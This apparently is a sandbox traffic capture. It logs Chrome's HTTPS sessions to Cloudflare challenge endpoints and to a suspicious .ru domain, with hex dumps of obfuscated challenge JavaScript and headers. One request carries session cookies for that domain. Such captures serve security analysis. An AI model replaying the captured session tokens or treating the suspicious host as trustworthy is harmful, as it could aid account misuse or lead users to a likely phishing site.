                                                      Data Ascii: J=0,K=Math[h3(874)](2,8),F=1;F!=K;L=H&G,H>>=1,0==H&&(H=j,G=d[h3(1339)](o,I++)),J|=(d[h3(1506)](0,L)?1:0)*F,F<<=1);M=d[h3(1909)](e,J);break;case 1:for(J=0,K=Math[h3(874)](2,16),F=1;K!=F;L=G&H,H>>=1,d[h3(928)](0,H)&&(H=j,G=d[h3(635)](o,I++)),J|=(d[h3(1695)]
                                                      2025-01-14 15:11:24 UTC1369INData Raw: 5b 68 45 28 31 35 33 37 29 5d 5d 26 26 28 65 4d 5b 68 45 28 31 31 34 33 29 5d 5b 68 45 28 31 34 33 33 29 5d 28 29 2c 65 4d 5b 68 45 28 31 31 34 33 29 5d 5b 68 45 28 31 33 37 31 29 5d 28 29 2c 65 4d 5b 68 45 28 39 35 39 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 68 45 28 31 35 33 37 29 5d 5d 5b 68 45 28 31 36 35 32 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 68 45 28 31 30 37 35 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 45 28 31 36 30 33 29 5d 5b 68 45 28 39 37 34 29 5d 2c 27 65 76 65 6e 74 27 3a 68 45 28 35 30 37 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 45 28 31 36 30 33 29 5d 5b 68 45 28 35 37 33 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 45 28 31 36 30 33 29 5d 5b 68 45 28 37 35 30 29 5d 2c 27 63 6f 64 65 27 3a 68 45 28 31 37 31
                                                      Data Ascii: [hE(1537)]]&&(eM[hE(1143)][hE(1433)](),eM[hE(1143)][hE(1371)](),eM[hE(959)]=!![],eM[e[hE(1537)]][hE(1652)]({'source':hE(1075),'widgetId':eM[hE(1603)][hE(974)],'event':hE(507),'cfChlOut':eM[hE(1603)][hE(573)],'cfChlOutS':eM[hE(1603)][hE(750)],'code':hE(171
                                                      2025-01-14 15:11:24 UTC1369INData Raw: 65 4d 5b 68 46 28 31 36 30 33 29 5d 5b 68 46 28 38 37 31 29 5d 2c 73 3d 7b 7d 2c 73 5b 68 46 28 31 38 32 33 29 5d 3d 65 4d 5b 68 46 28 31 36 30 33 29 5d 5b 68 46 28 31 38 32 33 29 5d 2c 73 5b 68 46 28 38 34 38 29 5d 3d 65 4d 5b 68 46 28 31 36 30 33 29 5d 5b 68 46 28 38 34 38 29 5d 2c 73 5b 68 46 28 36 30 39 29 5d 3d 65 4d 5b 68 46 28 31 36 30 33 29 5d 5b 68 46 28 36 30 39 29 5d 2c 73 5b 68 46 28 31 34 32 34 29 5d 3d 65 4d 5b 68 46 28 31 36 30 33 29 5d 5b 68 46 28 34 37 39 29 5d 2c 78 3d 73 2c 42 3d 6e 65 77 20 65 4d 5b 28 68 46 28 39 31 34 29 29 5d 28 29 2c 21 42 29 72 65 74 75 72 6e 3b 43 3d 68 46 28 31 34 30 30 29 2c 42 5b 68 46 28 31 34 37 32 29 5d 28 43 2c 6f 2c 21 21 5b 5d 29 2c 42 5b 68 46 28 31 37 30 36 29 5d 3d 35 65 33 2c 42 5b 68 46 28 31 35 32
                                                      Data Ascii: eM[hF(1603)][hF(871)],s={},s[hF(1823)]=eM[hF(1603)][hF(1823)],s[hF(848)]=eM[hF(1603)][hF(848)],s[hF(609)]=eM[hF(1603)][hF(609)],s[hF(1424)]=eM[hF(1603)][hF(479)],x=s,B=new eM[(hF(914))](),!B)return;C=hF(1400),B[hF(1472)](C,o,!![]),B[hF(1706)]=5e3,B[hF(152
                                                      2025-01-14 15:11:24 UTC1369INData Raw: 3e 2d 31 29 3f 65 4d 5b 68 4b 28 39 32 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 4c 29 7b 68 4c 3d 68 4b 2c 65 4d 5b 68 4c 28 31 36 35 35 29 5d 28 29 7d 2c 31 65 33 29 3a 6b 5b 68 4b 28 37 36 31 29 5d 21 3d 3d 6b 5b 68 4b 28 37 32 39 29 5d 3f 28 6e 3d 7b 7d 2c 6e 5b 68 4b 28 31 36 32 37 29 5d 3d 65 2c 6e 5b 68 4b 28 31 32 35 33 29 5d 3d 66 2c 6e 5b 68 4b 28 34 36 32 29 5d 3d 67 2c 6e 5b 68 4b 28 31 32 36 39 29 5d 3d 68 2c 6e 5b 68 4b 28 31 30 31 31 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 68 4b 28 39 32 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 4d 29 7b 68 4d 3d 68 4b 2c 65 4d 5b 68 4d 28 31 31 32 30 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 6b 5b 68 4d 28 31 32 37 32 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 68 4b 28 39 32 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28
                                                      Data Ascii: >-1)?eM[hK(927)](function(hL){hL=hK,eM[hL(1655)]()},1e3):k[hK(761)]!==k[hK(729)]?(n={},n[hK(1627)]=e,n[hK(1253)]=f,n[hK(462)]=g,n[hK(1269)]=h,n[hK(1011)]=i,o=n,eM[hK(927)](function(hM){hM=hK,eM[hM(1120)](o,undefined,k[hM(1272)])},10),eM[hK(927)](function(


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.749730104.18.95.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:24 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ipdm4/0x4AAAAAAA3RtpCTVu7-vpVs/auto/fbE/normal/auto/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:24 UTC240INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:24 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 61
                                                      Connection: close
                                                      cache-control: max-age=2629800, public
                                                      Server: cloudflare
                                                      CF-RAY: 901e8eefbc67424d-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:24 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.749719188.114.96.34433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:24 UTC1318OUTGET /favicon.ico HTTP/1.1
                                                      Host: 2ol.itectaxice.ru
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://2ol.itectaxice.ru/Qm75/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6InFNTGdQdjV4dmMrd0lLNTFOdld2bmc9PSIsInZhbHVlIjoicEI5T0wzcGlqS0FZRkdjMmt6YStjY2lkdTE0cHg4dkxWL2hhWWczUlF6ekhzT013QU50aG9Jc3FJZm5MUXR5bEZSaTBXendNbXBtMFhKV2tvZnVHYUkvdVo3cllpYnltalFNdlRlTjc0cGpBT0V3YmtGeVMvL2tIN3hZT1U5aXoiLCJtYWMiOiIyNjA4YTdjMTNjMjRkMmI5N2M5Mjg0MWZjMzRiYWQ1ZjdlM2VkZDY0NjkwOWUxOGMwNjY3MjgyOGYwOTNmZGVlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkltRDBwY2hSeXQxTDB2d1hFaWUrdmc9PSIsInZhbHVlIjoiNEJVTi9xdC96MkEzcmJoQU04N3BhdmlqczA5Q1REdDRDeThXSnI0Z0prYmlpa0Z0Z2U0RnRLR2ozcUplM0JWS3FiclJ6bmZTTDM2ZUNTYWhUVm9EUmcwVXZTVnFuYldLbkQzTGhDd3Z5VU5TblRISXAxVHY2TnVCNzBubWVjTnAiLCJtYWMiOiI4NzExYjBmZjIzMGUwNzIzYTk1YzhkYjQwZjE5Y2EwYmQ0YTViMjdhOWYxNzFkYTFkMDU5M2EyZmE1M2I1OTg1IiwidGFnIjoiIn0%3D
                                                      2025-01-14 15:11:24 UTC1069INHTTP/1.1 404 Not Found
                                                      Date: Tue, 14 Jan 2025 15:11:24 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: max-age=14400
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=STDMai5FCe%2FxVgtmq82CVdIFbVQ%2FkkxjbFk68xVQSF9k7DsZTCb7MdSgpsC6Yb0ArlyuycI3jlcOH%2FjA96B4%2FddYyqVoZ%2FByo6CDjA%2FnjPUqcQ4AhGnsUAr3RLH%2BOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Vary: Accept-Encoding
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=5472&min_rtt=5450&rtt_var=1574&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2232&delivery_rate=510668&cwnd=251&unsent_bytes=0&cid=efc8f949ee0e58bd&ts=154&x=0"
                                                      CF-Cache-Status: EXPIRED
                                                      Server: cloudflare
                                                      CF-RAY: 901e8ef27f6ac445-EWR
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1668&rtt_var=631&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1896&delivery_rate=1727810&cwnd=232&unsent_bytes=0&cid=f8fa9c0cdeee5694&ts=4287&x=0"
                                                      2025-01-14 15:11:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.749733104.18.94.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:24 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901e8eeb3e1dc337&lang=auto HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:25 UTC331INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:25 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Content-Length: 126304
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Server: cloudflare
                                                      CF-RAY: 901e8ef54fcede98-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:25 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 74 75 72 6e 73 74
                                                      Data Ascii: oudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_feedback_report":"Having%20trouble%3F","turnst
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 2c 67 33 2c 67 37 2c 67 38 2c 67 39 2c 67 64 2c 67 65 2c 67 68 2c 67 69 2c 67 66 2c 67 67 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 30 33 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 30 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 36 32 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 32 31 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 33 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 30 37 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 37 34 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35
                                                      Data Ascii: ,g3,g7,g8,g9,gd,ge,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(603))/1*(parseInt(gI(1100))/2)+parseInt(gI(762))/3+-parseInt(gI(1321))/4+parseInt(gI(1103))/5+parseInt(gI(707))/6+-parseInt(gI(974))/7*(-parseInt(gI(5
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 67 59 28 36 37 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 67 59 28 31 35 33 32 29 5d 3d 67 59 28 31 35 37 39 29 2c 6a 5b 67 59 28 37 38 32 29 5d 3d 67 59 28 38 39 33 29 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 65 52 28 67 5b 67 59 28 36 35 33 29 5d 2c 67 5b 67 59 28 39 39 38 29 5d 29 2c 67 5b 67 59 28 36 35 33 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 67 5b 67 59 28 36 35 33 29 5d 3d 4a 53 4f 4e 5b 67 59 28 31 33 39 33 29 5d 28 67 5b 67 59 28 36 35 33 29 5d 2c 4f 62 6a 65 63 74 5b 67 59 28 36 30 39 29 5d 28 67 5b 67 59 28 36 35 33 29 5d 29 29 3a 67 5b 67 59 28 36 35 33 29 5d 3d 4a 53 4f 4e 5b 67 59 28 31 33 39 33
                                                      Data Ascii: nction(G,H){return G+H},j[gY(675)]=function(G,H){return G+H},j[gY(1532)]=gY(1579),j[gY(782)]=gY(893),j);try{if(l=eR(g[gY(653)],g[gY(998)]),g[gY(653)]instanceof Error?g[gY(653)]=JSON[gY(1393)](g[gY(653)],Object[gY(609)](g[gY(653)])):g[gY(653)]=JSON[gY(1393
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2d 6f 7d 2c 27 42 4c 78 50 75 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 5e 6f 7d 2c 27 4e 6e 4f 6c 71 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 5e 6e 7d 2c 27 52 44 41 49 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 4c 79 72 61 48 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 26 6f 7d 2c 27 77 46 55 48 70 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 26 6f 7d 2c 27 63 49 4f 75 42 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 61 71 64 4d 54 27 3a 66 75 6e 63 74 69 6f
                                                      Data Ascii: function(n,o){return n-o},'BLxPu':function(n,o){return n^o},'NnOlq':function(n,o){return o^n},'RDAIN':function(n,o,s){return n(o,s)},'LyraH':function(n,o){return n&o},'wFUHp':function(n,o){return n&o},'cIOuB':function(n,o,s){return n(o,s)},'aqdMT':functio
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 34 2c 35 32 38 37 33 34 36 33 35 2c 31 35 34 31 34 35 39 32 32 35 5d 2c 76 3d 61 33 28 36 34 29 2c 61 34 5b 65 5b 67 5a 28 33 31 38 29 5d 28 61 35 2c 35 29 5d 7c 3d 31 32 38 2e 33 36 3c 3c 32 34 2d 61 36 25 33 32 2c 61 37 5b 65 5b 67 5a 28 31 35 36 30 29 5d 28 61 38 2b 36 34 3e 3e 39 3c 3c 34 2c 31 35 29 5d 3d 61 39 2c 78 3d 30 3b 65 5b 67 5a 28 31 32 33 39 29 5d 28 78 2c 61 61 5b 67 5a 28 32 34 36 29 5d 29 3b 78 2b 3d 31 36 29 7b 66 6f 72 28 61 4c 3d 73 5b 30 5d 2c 43 3d 73 5b 31 5d 2c 44 3d 73 5b 32 5d 2c 45 3d 73 5b 33 5d 2c 46 3d 73 5b 34 5d 2c 47 3d 73 5b 35 5d 2c 48 3d 73 5b 36 5d 2c 49 3d 73 5b 37 5d 2c 42 3d 30 3b 65 5b 67 5a 28 35 37 30 29 5d 28 36 34 2c 42 29 3b 42 2b 2b 29 66 6f 72 28 4a 3d 65 5b 67 5a 28 31 35 37 31 29 5d 5b 67 5a 28 39 38 37
                                                      Data Ascii: 4,528734635,1541459225],v=a3(64),a4[e[gZ(318)](a5,5)]|=128.36<<24-a6%32,a7[e[gZ(1560)](a8+64>>9<<4,15)]=a9,x=0;e[gZ(1239)](x,aa[gZ(246)]);x+=16){for(aL=s[0],C=s[1],D=s[2],E=s[3],F=s[4],G=s[5],H=s[6],I=s[7],B=0;e[gZ(570)](64,B);B++)for(J=e[gZ(1571)][gZ(987
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 5b 34 5d 29 2c 73 5b 35 5d 3d 65 5b 67 5a 28 35 39 31 29 5d 28 62 69 2c 47 2c 73 5b 35 5d 29 2c 73 5b 36 5d 3d 65 5b 67 5a 28 31 32 31 35 29 5d 28 62 6a 2c 48 2c 73 5b 36 5d 29 2c 73 5b 37 5d 3d 62 6b 28 49 2c 73 5b 37 5d 29 7d 72 65 74 75 72 6e 20 73 7d 7d 7d 65 6c 73 65 20 66 3d 4a 53 4f 4e 5b 67 5a 28 31 33 39 33 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 67 5a 28 31 31 37 35 29 5d 3d 66 2c 6d 5b 67 5a 28 39 39 38 29 5d 3d 67 2c 6d 5b 67 5a 28 31 35 35 36 29 5d 3d 68 2c 6d 5b 67 5a 28 31 37 35 38 29 5d 3d 69 2c 6d 5b 67 5a 28 36 35 33 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4a 28 31 34 37 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 68 31 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 68 31 3d 67 4a 2c 6a 3d 7b 7d 2c
                                                      Data Ascii: [4]),s[5]=e[gZ(591)](bi,G,s[5]),s[6]=e[gZ(1215)](bj,H,s[6]),s[7]=bk(I,s[7])}return s}}}else f=JSON[gZ(1393)](d);return m={},m[gZ(1175)]=f,m[gZ(998)]=g,m[gZ(1556)]=h,m[gZ(1758)]=i,m[gZ(653)]=d,m},eM[gJ(1470)]=function(e,f,g,h,i,h1,j,k,l,m,n,o){(h1=gJ,j={},
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 5d 3d 3d 3d 66 5b 68 50 28 31 34 34 38 29 5d 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 75 29 7d 29 2c 66 77 3d 21 5b 5d 2c 21 65 58 28 67 4a 28 38 39 39 29 29 26 26 28 66 55 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 73 2c 64 2c 65 2c 66 2c 67 2c 69 2c 6a 29 7b 28 69 73 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 69 73 28 34 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 5e 69 7d 2c 64 5b 69 73 28 31 32 39 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 64 5b 69 73 28 34 37 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 64 5b 69 73 28 35 34 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72
                                                      Data Ascii: ]===f[hP(1448)]&&clearInterval(fu)}),fw=![],!eX(gJ(899))&&(fU(),setInterval(function(is,d,e,f,g,i,j){(is=gJ,d={},d[is(460)]=function(h,i){return h^i},d[is(1292)]=function(h,i){return h+i},d[is(477)]=function(h,i){return h-i},d[is(541)]=function(h,i){retur
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 4a 28 36 31 32 29 5d 3d 21 5b 5d 2c 66 56 5b 67 4a 28 31 30 32 32 29 5d 3d 65 58 2c 66 56 5b 67 4a 28 31 65 33 29 5d 3d 66 4a 2c 66 56 5b 67 4a 28 34 34 33 29 5d 3d 66 4f 2c 66 56 5b 67 4a 28 31 33 30 30 29 5d 3d 66 50 2c 66 56 5b 67 4a 28 31 35 34 30 29 5d 3d 66 4b 2c 66 56 5b 67 4a 28 31 31 30 39 29 5d 3d 66 51 2c 66 56 5b 67 4a 28 34 31 36 29 5d 3d 66 4e 2c 66 56 5b 67 4a 28 31 33 33 30 29 5d 3d 66 4d 2c 66 56 5b 67 4a 28 36 35 30 29 5d 3d 66 62 2c 66 56 5b 67 4a 28 31 37 34 37 29 5d 3d 66 49 2c 66 56 5b 67 4a 28 37 31 37 29 5d 3d 66 48 2c 66 56 5b 67 4a 28 39 30 37 29 5d 3d 66 32 2c 66 56 5b 67 4a 28 31 36 32 30 29 5d 3d 66 33 2c 66 56 5b 67 4a 28 31 33 39 38 29 5d 3d 66 70 2c 66 56 5b 67 4a 28 39 31 35 29 5d 3d 66 72 2c 66 56 5b 67 4a 28 38 34 33 29
                                                      Data Ascii: J(612)]=![],fV[gJ(1022)]=eX,fV[gJ(1e3)]=fJ,fV[gJ(443)]=fO,fV[gJ(1300)]=fP,fV[gJ(1540)]=fK,fV[gJ(1109)]=fQ,fV[gJ(416)]=fN,fV[gJ(1330)]=fM,fV[gJ(650)]=fb,fV[gJ(1747)]=fI,fV[gJ(717)]=fH,fV[gJ(907)]=f2,fV[gJ(1620)]=f3,fV[gJ(1398)]=fp,fV[gJ(915)]=fr,fV[gJ(843)
                                                      2025-01-14 15:11:25 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 51 4d 59 57 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 44 4c 55 54 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 66 55 71 4f 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 68 62 64 72 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 50 42 52 45 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 55 6b 58 42 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 56 79 56 50 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68
                                                      Data Ascii: ':function(h,i){return h-i},'QMYWb':function(h,i){return h<<i},'DLUTx':function(h,i){return i==h},'fUqOn':function(h,i){return h(i)},'hbdrW':function(h,i){return h(i)},'PBREi':function(h,i){return h>i},'UkXBZ':function(h,i){return h==i},'VyVPq':function(h


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.749732104.18.94.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:24 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:25 UTC240INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:25 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 61
                                                      Connection: close
                                                      cache-control: max-age=2629800, public
                                                      Server: cloudflare
                                                      CF-RAY: 901e8ef54c0642e2-EWR
                                                      alt-svc: h3=":443"; ma=86400
